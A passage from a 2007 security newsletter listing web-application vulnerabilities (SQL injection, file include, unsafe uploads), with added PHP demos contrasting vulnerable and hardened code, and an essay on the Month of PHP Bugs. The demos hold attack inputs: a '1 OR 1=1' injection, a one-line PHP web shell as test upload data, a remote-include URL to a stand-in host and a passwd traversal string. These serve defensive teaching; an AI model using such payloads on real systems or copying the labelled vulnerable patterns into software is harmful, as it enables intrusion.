  • Title: Hitachi Multiple Products Unspecified SQL Injection
  • Description: Multiple Hitachi products are exposed to an SQL injection issue because they fail to properly sanitize user-supplied input to unspecified parameters before using it in an SQL query.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-008_e/index-e.html

  • 07.14.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Xoops Friendfinder Module View.PHP SQL Injection
  • Description: The Xoops Friendfinder module is a social-networking module for the Xoops portal. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "view.php" script before using it in an SQL query. Xoops Friendfinder module versions 3.3 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/23184

  • 07.14.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Xoops Print.PHP SQL Injection
  • Description: Xoops is a web portal application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "print.php" script before using it in an SQL query. Xoops versions 2.0.16 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/23160

  • 07.14.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: FlexBB Start.PHP SQL Injection
  • Description: FlexBB is a web-based bulletin board application. It is exposed to an SQL injection issue because it fails to sufficiently sanitize the value of the "flexbb_lang_id" cookie (read via $_COOKIE in the "Includes/Start.php" script) before using it in an SQL query.
  • Ref: http://www.securityfocus.com/archive/1/463917

  • 07.14.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! D4J eZine Component Index.PHP SQL Injection
  • Description: D4J eZine is a newspaper/magazine application for the Joomla! content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "article" parameter of the "index.php" script before using it in an SQL query. D4J eZine version 2.8 is affected.
  • Ref: http://www.securityfocus.com/bid/23165

  • 07.14.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: IceBB Avatar Upload Index.PHP SQL Injection
  • Description: IceBB is a bulletin-board system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data when uploading avatar images. IceBB version 1.0-rc5 is affected.
  • Ref: http://www.securityfocus.com/bid/23158

  • 07.14.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Webformatique Car Manager Joomla Component Index.PHP SQL Injection
  • Description: Webformatique Car Manager is a component for the Joomla! CMS which allows users to publish car rental information on the web; it is implemented in PHP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script before using it in an SQL query. Car Manager versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23131

  • 07.14.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla RWCards Component SQL Injection
  • Description: Joomla RWCards Component is a component for Joomla to send E-Cards. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "category_id" parameter of the "index.php" script before using it in an SQL query. RWCards versions 2.4.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23126

  • 07.14.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Multiple ActiveWebSoftwares Products Default.ASP SQL Injection
  • Description: Active Trade and Active Auction House are web-based auction applications. The applications are exposed to an SQL injection issue because they fail to properly sanitize user-supplied input to the "catid" parameter of the "default.asp" script before using it in SQL queries. Active Web Softwares Active Trade version 2.0 and Auction House version 3.6 are affected.
  • Ref: http://www.securityfocus.com/bid/23109

  • 07.14.56 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ActiveBuyAndSell BuyerSend.ASP SQL Injection
  • Description: ActiveBuyandSell is a web-based shopping cart. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "catid" parameter of the "buyersend.asp" script before using it in an SQL query. ActiveBuyandSell version 6.2 is affected.
  • Ref: http://www.securityfocus.com/bid/23110

  • 07.14.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Active Newsletter ViewNewspapers.ASP SQL Injection
  • Description: Active Newsletter is a web-based newsletter and mailing-list application. It is exposed to an SQL injection vulnerability because it fails to properly sanitize input supplied to the "NewspaperID" parameter of the "ViewNewspapers.asp" script. Active Newsletter version 4.3 is affected.
  • Ref: http://www.securityfocus.com/bid/23115
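
Nearly every SQL injection entry above reads the same way: an "id", "cat" or "catid" parameter is concatenated into a query. The following script is an added example, not any listed vendor's code, and runs against an in-memory SQLite database so it can be tried offline; the table, rows and parameter names are constructed for the demo. It shows the tautology attack succeeding against the concatenated query and failing against the prepared statement.

```php
<?php
// Added example, not any listed vendor's code: the "parameter straight into the
// query" bug class behind the entries above, next to a prepared-statement fix.
// The table, rows, script and parameter names are constructed for this demo.

$db = new PDO('sqlite::memory:');   // in-memory database so the script runs offline
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pictures (id INTEGER, cat INTEGER, title TEXT, hidden INTEGER)');
$db->exec("INSERT INTO pictures VALUES (1, 1, 'public photo', 0)");
$db->exec("INSERT INTO pictures VALUES (2, 2, 'private photo', 1)");

// VULNERABLE: string concatenation.  wall.php?cat=1%20OR%201=1 turns the WHERE
// clause into (hidden = 0 AND cat = 1) OR 1=1, which matches every row,
// hidden ones included.  No quote is needed because the column is numeric,
// so quote-escaping functions would not have helped here.
function pictures_vulnerable(PDO $db, array $get)
{
    $cat = isset($get['cat']) ? $get['cat'] : '0';
    $sql = 'SELECT title FROM pictures WHERE hidden = 0 AND cat = ' . $cat;
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: the value never becomes part of the SQL text.  The statement is
// prepared with a placeholder and the parameter travels separately, so
// "1 OR 1=1" is compared as one literal and cannot change the query's shape.
// Casting enforces the expected type on top of that.  (With MySQL also set
// PDO::ATTR_EMULATE_PREPARES to false so the server, not the driver, binds.)
function pictures_hardened(PDO $db, array $get)
{
    $cat  = isset($get['cat']) ? (int) $get['cat'] : 0;
    $stmt = $db->prepare('SELECT title FROM pictures WHERE hidden = 0 AND cat = :cat');
    $stmt->execute(array(':cat' => $cat));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$attack = array('cat' => '1 OR 1=1');
print_r(pictures_vulnerable($db, $attack));   // both titles: the hidden row leaks
print_r(pictures_hardened($db, $attack));     // only "public photo"
```

The ASP entries in this block (Active Trade, ActiveBuyandSell, Active Newsletter) have the same root cause and the same remedy: parameterised commands rather than string-built SQL.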

  • 07.14.58 - CVE: Not Available
  • Platform: Web Application
  • Title: sBlog Local File Include
  • Description: sBlog is a simple web log application. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "conf_lang_default" parameter of the "lang.php" script. sBlog version 7.3 Beta is affected.
  • Ref: http://www.securityfocus.com/bid/23206

  • 07.14.59 - CVE: Not Available
  • Platform: Web Application
  • Title: Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
  • Description: Kaqoo Auction is a web-based auction script. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "install_root" parameter.
  • Ref: http://www.securityfocus.com/bid/23211

  • 07.14.60 - CVE: Not Available
  • Platform: Web Application
  • Title: Softerra Time-Assistant Multiple Remote File Include Vulnerabilities
  • Description: Softerra Time-Assistant is a web-based time tracking application. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input to the "inc_dir" and "lib_dir" parameters of the "lib/timesheet.class.php" script before using it in an "include()" function call. Softerra Time-Assistant versions 6.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/464281

  • 07.14.61 - CVE: Not Available
  • Platform: Web Application
  • Title: CodeBB PHPBB_Root_Path Remote File Include
  • Description: CodeBB is a web-based forum. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "pass_code.php" script. CodeBB version 1.0 Beta 2 is affected.
  • Ref: http://www.securityfocus.com/bid/23185

  • 07.14.62 - CVE: Not Available
  • Platform: Web Application
  • Title: MsxStudios Advanced Login ProfileEdit.PHP Remote File Include
  • Description: Advanced Login is a web-based login application. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "root" parameter of the "engine/profiledit.php" and "engine/db/profiledit.php" scripts. Advanced Login version 0.7 is affected.
  • Ref: http://www.securityfocus.com/archive/1/464147

  • 07.14.63 - CVE: Not Available
  • Platform: Web Application
  • Title: LDAP Account Manager Unspecified HTML Injection
  • Description: LDAP Account Manager is a web front end for managing accounts stored in an LDAP directory. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input in unspecified LDAP data before rendering it. LDAP Account Manager versions prior to 1.3.0 are affected.
  • Ref: https://sourceforge.net/tracker/index.php?func=detail&aid=1687379&group_id=73243&atid=537211

  • 07.14.64 - CVE: Not Available
  • Platform: Web Application
  • Title: MangoBery Multiple Remote File Include Vulnerabilities
  • Description: MangoBery is a content management system. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input before processing it in an "include()" function call. MangoBery version 0.5.5 is affected.
  • Ref: http://www.securityfocus.com/bid/23187

  • 07.14.65 - CVE: Not Available
  • Platform: Web Application
  • Title: AY System Solutions Web Content System Remote File Include
  • Description: Web Content System is a content manager. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "path[JavascriptEdit]" parameter of the "manage/javascript/formjavascript.php" script. Web Content System version 2.7.1 is affected.
  • Ref: http://www.securityfocus.com/bid/23171

  • 07.14.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Eve-Nuke Forums MySQL.PHP Remote File Include
  • Description: Eve-Nuke Forums is a web forum. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "db/mysql.php" script. Eve-Nuke Forum beta.01 is affected.
  • Ref: http://www.securityfocus.com/bid/23176

  • 07.14.67 - CVE: Not Available
  • Platform: Web Application
  • Title: JBrowser Upload.PHP3 Arbitrary File Upload
  • Description: JBrowser is an image gallery application. The application is exposed to an arbitrary file upload issue because the "upload.php3" script fails to properly verify the file extensions of uploaded files. JBrowser versions 2.4 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/23166

  • 07.14.68 - CVE: Not Available
  • Platform: Web Application
  • Title: IceBB Avatar Upload Remote PHP Code Execution
  • Description: IceBB is a PHP-based forum solution. The application is exposed to an arbitrary PHP code execution issue because the upload function fails to properly validate the file type of uploaded avatars. IceBB version 1.0-rc5 is affected.
  • Ref: http://www.securityfocus.com/bid/23151
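
The JBrowser and IceBB entries are the two halves of one mistake: deciding what an upload is from the filename or MIME type the browser sent. The script below is an added example, not code from either project; the field names and sample files are constructed for the demo. It shows a suffix check accepting "shell.php3" and a PHP script renamed to ".gif", and a validation routine that checks the last extension against an allowlist, checks the bytes, and discards the client's filename altogether.

```php
<?php
// Added example, not JBrowser's or IceBB's code: why an extension check on
// the client-supplied filename is not enough, and a validation routine that
// checks extension, content and storage name.  Field names are placeholders.

// VULNERABLE: only the literal suffix ".php" is refused.  "shell.php3",
// "shell.phtml" or "shell.PHP" pass, "x.php.gif" runs as PHP on an Apache
// that maps the handler with AddHandler, and $_FILES[...]['type'] is whatever
// the browser (i.e. the attacker) declared, so it proves nothing about the bytes.
function accept_vulnerable(array $file)
{
    return substr($file['name'], -4) !== '.php';
}

// HARDENED: returns the name to store the file under, or null to reject.
function validate_upload(array $file)
{
    // 1. Allowlist the LAST extension, case-insensitively; a denylist can
    //    never enumerate every suffix a web server might hand to PHP.
    $allowed = array('jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif');
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // 2. The bytes must parse as that image type.  This checks content, not
    //    the client's declared MIME type.  It is not a complete guarantee (a
    //    valid GIF can carry PHP in a comment block), which is why steps 1
    //    and 3 must hold as well.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $allowed[$ext]) {
        return null;
    }
    // 3. Generate the stored name; nothing from the request reaches the path.
    //    The real handler then calls move_uploaded_file($file['tmp_name'],
    //    $dir . '/' . $name) into a directory the web server will not execute
    //    scripts from, ideally outside the document root.  (random_bytes: PHP 7+)
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed uploads: a genuine 1x1 GIF and a PHP script, under various names.
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAAACwAAAAAAQABAAACAkQBADs=');
$php = "<?php system(\$_GET['c']); ?>";
$cases = array(
    array('name' => 'avatar.gif', 'data' => $gif),
    array('name' => 'shell.php3', 'data' => $php),
    array('name' => 'shell.gif',  'data' => $php),
    array('name' => 'x.php.gif',  'data' => $gif),
);
foreach ($cases as $c) {
    $path = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($path, $c['data']);
    $file = array('name' => $c['name'], 'tmp_name' => $path, 'type' => 'image/gif');
    $stored = validate_upload($file);
    printf("%-12s vulnerable=%s hardened=%s\n", $c['name'],
        accept_vulnerable($file) ? 'accept' : 'reject',
        $stored === null ? 'reject' : 'accept as ' . $stored);
    unlink($path);
}
```

"x.php.gif" with genuine GIF content is accepted by the hardened routine, and that is fine: it is stored under a generated name with a ".gif" suffix in a directory that does not execute scripts, so the double extension never reaches the web server.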

  • 07.14.69 - CVE: Not Available
  • Platform: Web Application
  • Title: C-Arbre Multiple Remote File Include Vulnerabilities
  • Description: C-Arbre is a web-based document publishing system. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "root_path" parameter. C-Arbre versions 0.6PR7 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/463925

  • 07.14.70 - CVE: Not Available
  • Platform: Web Application
  • Title: SB-WebSoft Addressbook Local File Include
  • Description: SB WebSoft Addressbook is a third party address book module for the PHP Nuke content management system. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "module_name" parameter of the "addressbook.php" script. SB-WebSoft Addressbook version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/23156

  • 07.14.71 - CVE: Not Available
  • Platform: Web Application
  • Title: Horde Groupware Webmail Edition Unspecified Parameters Multiple HTML Injection Vulnerabilities
  • Description: Horde Groupware Webmail Edition is a web-based email application. It is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Horde Groupware Webmail version 1.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/463911

  • 07.14.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Mephisto Blog Author Comment HTML Injection
  • Description: Mephisto Blog is a web log application implemented in Ruby. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Mephisto Blog version 0.7.3 is affected.
  • Ref: http://www.securityfocus.com/bid/23137

  • 07.14.73 - CVE: Not Available
  • Platform: Web Application
  • Title: ttCMS EZ_SQL.PHP Remote File Include
  • Description: ttCMS is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "lib_path" parameter of the "lib/db/ez_sql.php" script. ttCMS version 4 is affected.
  • Ref: http://www.securityfocus.com/bid/23139

  • 07.14.74 - CVE: Not Available
  • Platform: Web Application
  • Title: Satel Lite Satellite.PHP Local File Include
  • Description: Satel Lite is a third party plugin for the PHP Nuke content management system. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "name" parameter of the "Satellite.php" script.
  • Ref: http://www.securityfocus.com/bid/23143

  • 07.14.75 - CVE: Not Available
  • Platform: Web Application
  • Title: PBLang Administrative Account Creation Privilege Escalation
  • Description: PBLang is a bulletin board application. It is exposed to a privilege escalation issue because the "register.php" script fails to properly ensure that remote users are successfully authenticated prior to carrying out actions. PBLang version 4.66z is affected.
  • Ref: http://www.securityfocus.com/bid/23123

  • 07.14.76 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla Joomlaboard Component Multiple Remote File Include Vulnerabilities
  • Description: Joomlaboard (formerly SimpleBoard) is a component of Joomla! CMS. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input to the "sbp" parameter of the "file_upload.php" and "image_upload.php" scripts. Joomlaboard versions 1.1.0 through 1.1.5.2 are affected.
  • Ref: http://www.securityfocus.com/bid/23129

  • 07.14.77 - CVE: Not Available
  • Platform: Web Application
  • Title: Net Side CMS Index.PHP Remote File Include
  • Description: Net Side CMS is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "cms" parameter of the "index.php" script.
  • Ref: http://www.securityfocus.com/bid/23130

  • 07.14.78 - CVE: Not Available
  • Platform: Web Application
  • Title: Image_Upload Script Multiple Remote File Include Vulnerabilities
  • Description: Image_Upload Script is a web-based file transfer application for images. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "AD_BODY_TEMP" parameter of the "login.php", "frontpage.php" and "forgot_pass.php" scripts. Image_Upload Script version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/23132

  • 07.14.79 - CVE: CVE-2006-5763, CVE-2006-5764
  • Platform: Web Application
  • Title: File Upload System Multiple Remote File Include Vulnerabilities
  • Description: File Upload System is a web-based file transfer application. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "AD_BODY_TEMP" parameter of the "contact.php", "login.php", "register.php", and "forgot_pass.php" scripts. File Upload System version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/23118

  • 07.14.80 - CVE: Not Available
  • Platform: Web Application
  • Title: Mambo FlatMenu Module MosConfig_Absolute_Path Remote File Include
  • Description: The FlatMenu module provides an alternative menu for the Mambo content manager. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "mod_flatmenu.php" script. FlatMenu versions 1.07 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23125

  • 07.14.81 - CVE: Not Available
  • Platform: Web Application
  • Title: Mambo SWmenu MosConfig_Absolute_Path Parameter Multiple Remote File Include Vulnerabilities
  • Description: SWmenu is a menu component for the Mambo CMS that ships with an image manager/editor. The application is prone to multiple remote file include vulnerabilities because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the scripts "administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php" and "components/com_swmenupro/ImageManager/Classes/ImageManager.php". SWmenu version 4.0 is affected.
  • Ref: http://www.securityfocus.com/bid/23116

  • 07.14.82 - CVE: Not Available
  • Platform: Web Application
  • Title: RoseOnlineCMS Op Local File Include
  • Description: RoseOnlineCMS is a PHP-based CMS application. The application is exposed to a local file include issue because it fails to sufficiently sanitize the "op" parameter of the "index.php" script. RoseOnlineCMS version 3 beta2 is affected.
  • Ref: http://www.securityfocus.com/bid/23108

  • 07.14.83 - CVE: Not Available
  • Platform: Web Application
  • Title: Philex Remote and Local File Include Vulnerabilities
  • Description: Philex is a content manager. The application is exposed to remote and local file include issues because it fails to sufficiently sanitize user-supplied input to the "CssFile" parameter of the "header.inc.php" script. Philex version 0.2.3 is affected.
  • Ref: http://www.securityfocus.com/bid/23111

  • 07.14.84 - CVE: Not Available
  • Platform: Web Application
  • Title: UHP for Mambo UHP_Config.PHP Remote File Include
  • Description: UHP (User Home Pages) is a web-based content manager for Mambo. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "uhp_config.php" script before using the input in an "include()" function call. UHP version 0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/23113
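
The remote and local file include entries in this issue (a dozen of them, most in Mambo/Joomla! and PHP-Nuke add-ons) share one sink, include() fed from a request variable, and two enabling settings, register_globals and URL-capable includes. The script below is an added example, not code from any listed project; directory, file and parameter names are placeholders. It shows the vulnerable patterns in comments and runs the two controls that close them: a base path derived from the script's own location behind an entry-point guard, and an allowlist that maps a request value onto a fixed file set and confirms the resolved path stays inside the intended directory.

```php
<?php
// Added example, not code from any project listed above: the include() bug
// class behind the remote and local file include entries, and the two controls
// that close it.  Directory, file and parameter names are placeholders.

// VULNERABLE patterns (shown in comments, not executed):
//   include($mosConfig_absolute_path . '/includes/menu.php');
// With register_globals=On the request
//   mod_flatmenu.php?mosConfig_absolute_path=http://evil.example/s.txt?
// defines that variable before the include runs; the appended path lands in
// the URL's query string and, with allow_url_fopen (or allow_url_include on
// PHP 5.2+) enabled, PHP fetches and executes the attacker's file.
//   include('modules/' . $_GET['op'] . '.php');
// lets the request pick any local file (op=../../../../etc/passwd%00, where the
// NUL byte truncated the suffix on PHP before 5.3.4).

// CONTROL 1: library files derive their base directory from their own location
// and refuse to run unless the framework entry point defined its guard
// constant.  Nothing in the request can influence the path.
function library_base()
{
    if (!defined('_VALID_MOS')) {
        return null;                   // caller: die('Direct access denied')
    }
    return dirname(__FILE__);          // then: include library_base() . '/includes/menu.php'
}

// CONTROL 2: the request value is a key into a fixed allowlist, and the
// resolved path is confirmed to lie inside the modules directory.
function resolve_module($op, $modules_dir)
{
    $allowed = array('news', 'gallery', 'search');
    if (!is_string($op) || !in_array($op, $allowed, true)) {
        return null;
    }
    $dir  = realpath($modules_dir);
    $path = realpath($modules_dir . '/' . $op . '.php');
    if ($dir === false || $path === false
        || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;                   // missing, or resolved outside $dir
    }
    return $path;
}

// Demo on a constructed modules directory so the script runs stand-alone.
$root = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir($root . '/modules', 0700, true);
file_put_contents($root . '/modules/news.php', "<?php return 'news module loaded';\n");

$probes = array('news', 'gallery', '../../../../etc/passwd', "news\0",
                'http://evil.example/s.txt?');
foreach ($probes as $op) {
    $path = resolve_module($op, $root . '/modules');
    if ($path === null) {
        $result = 'REJECTED';
    } else {
        $result = include $path;       // only ever a path from the allowlist
    }
    printf("%-28s => %s\n", addcslashes($op, "\0"), $result);
}
printf("library_base() without guard => %s\n", var_export(library_base(), true));

unlink($root . '/modules/news.php');
rmdir($root . '/modules');
rmdir($root);
```

The allowlist rejects "gallery" as well, because the file does not exist: a missing allowed module is an error, not a reason to fall back to the request value. Disabling register_globals and allow_url_include in php.ini removes the enabling conditions across the whole host, which matters on shared hosting where an add-on like those above may be installed without the administrator's knowledge.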

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

THE MONTH OF PHP BUGS

The month of March brought us the Month of PHP Bugs (MOPB), a full-disclosure campaign aimed at improving the overall security in the popular PHP application server platform. Like previous Month of Bugs initiatives (Month of Browser Bugs, Month of Apple Bugs), the MOPB coordinators are releasing a new bug every day for the entire month of March. One of the heavy-hitters behind MOPB is Stefan Esser, a former member of the PHP security response team. Stefan left the PHP security team due to a lack of momentum and various impasses in fixing the security bugs he found.

Politics aside, the MOPB effort has lived up to its promise. We've seen a new bug every day. But should PHP users be worried? At the middle of the month, we performed a 'mid-month' analysis of the bugs released so far. The analysis reviewed the overall impact of the bugs, their applicability to common deployments, and how they were being fixed by the PHP developers. The mid-month analysis is available at: http://portal.spidynamics.com/blogs/jeff/archive/2007/03/19/Month-of-PHP-Bugs_3A00_-Mid_2D00_month-analysis.aspx

The biggest conclusion of the mid-month analysis was that typical users of the latest versions of PHP (5.2.1 and 4.4.5) only needed to worry about two bugs (MOPB #1 and #2). Those two bugs allow a remote attacker to perform a denial of service attack on the server. The remaining bugs were either fixed in the last released version of PHP, or require a local user/malicious PHP script executed on the system to exploit the bug. We also reviewed the bugs released after the mid-month analysis; our general conclusion is that the analysis results/conclusions are unaffected, as the newer bugs didn't change the overall dynamics of what was already released.

This brings up two important points: if you're not running the latest version of PHP (specifically 5.2.1 and 4.4.5), you should strongly investigate upgrading immediately. Many of the MOPB releases highlight bugs fixed in those releases, and some of them can be considered quite serious. Also, if you happen to be a web hosting provider or otherwise allow arbitrary users to upload and execute PHP scripts, you are in a very serious predicament: most of the MOPB bugs require local access to exploit, and once exploited, allow the arbitrary execution of code which can circumvent PHP's built-in safe mode and other security restrictions. You may consider looking to Esser et al.'s excellent and free Hardened-PHP or Suhosin patches to proactively add additional security constraints to PHP (and help mitigate many of the MOPB bugs in the process).

So far the PHP security team/developers have been making moderate fixes in response to the MOPB bugs. However, two things get called into question. First, just because the PHP team has committed a patch doesn't mean the bug is fixed. We've witnessed a few occasions where the fix wasn't thorough enough or was improperly applied. One of the MOPB bugs (#32) actually points to a new security problem introduced by the ad-hoc fix of MOPB bug #31. So while the speed of the PHP developers in committing patches is high, we can't necessarily say the same of the quality and thoroughness of the fixes. Second, even if all the fixes are committed to the development source code repository (CVS), we still have to wait for when the PHP team rolls the latest code into an official release. People generally don't deploy beta CVS snapshots of software on their production systems, so those fixes won't see widespread deployment until an official release is tested and made. And right now, there's no telling when that will happen. We hope it will occur almost immediately after the MOPB ends, but ultimately we will have to wait and see.

Even when there is an official PHP release, there can still be additional delay for various OS/package distributors (e.g. Linux, BSD) to turn the PHP release into a distribution package. For example, if you're a SuSE user, and you are using the SuSE RPM version of PHP, then after the PHP team releases the next version (e.g. 5.2.2 and/or 4.4.6), you still have to wait until SuSE either makes a new PHP RPM or back-ports the fixes to whatever PHP version branch they are using.

Curiosity got the better of us, so we decided to look at the various development mailing lists of many popular OS distributions (OpenBSD, FreeBSD, SuSE, Debian, and Fedora). We searched CVS commit lists, development discussion lists, and ports commit lists for any reference to PHP made on or after March 1st. We found OpenSuSE was the only one to have committed fixes for the MOPB bugs to their distribution package repository. SuSE also made a public statement in their latest Security Summary Report indicating they are watching the progress of the MOPB campaign and plan to act after it concludes. But aside from those two cases, our cursory look into the development efforts of some popular OS distros didn't turn up any current efforts to deal with any of the problems uncovered by the MOPB effort. We do want to explicitly note that this isn't necessarily a bad thing; it is understandable to wait until the conclusion of the MOPB campaign before acting. Plus, this doesn't reflect any private development efforts that haven't been committed into CVS yet. Regardless, it's still an interesting observation.

Overall this is an interesting time for PHP users. While there will be a little bit of turmoil in the release and deployment of the next PHP version, overall Esser and the MOPB crew have successfully bolstered the security of PHP. Combined with their ongoing efforts on the free Hardened-PHP and Suhosin security enhancements for PHP, I think one thing is clear: Esser and the MOPB crew truly are just trying to make the world a more secure place for PHP users. And for that, we should thank them.

Resources: Month of PHP Bugs: http://www.php-security.org/

Month of PHP Bugs: Mid-month analysis http://portal.spidynamics.com/blogs/jeff/archive/2007/03/19/Month-of-PHP-Bugs_3A00_-Mid_2D00_month-analysis.aspx

Hardened-PHP project: http://www.hardened-php.net/

Suhosin PHP security extension: http://www.hardened-php.net/suhosin/index.html

Questions: http://portal.spidynamics.com/blogs/spilabs/default.aspx

______________________________________________________________________

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.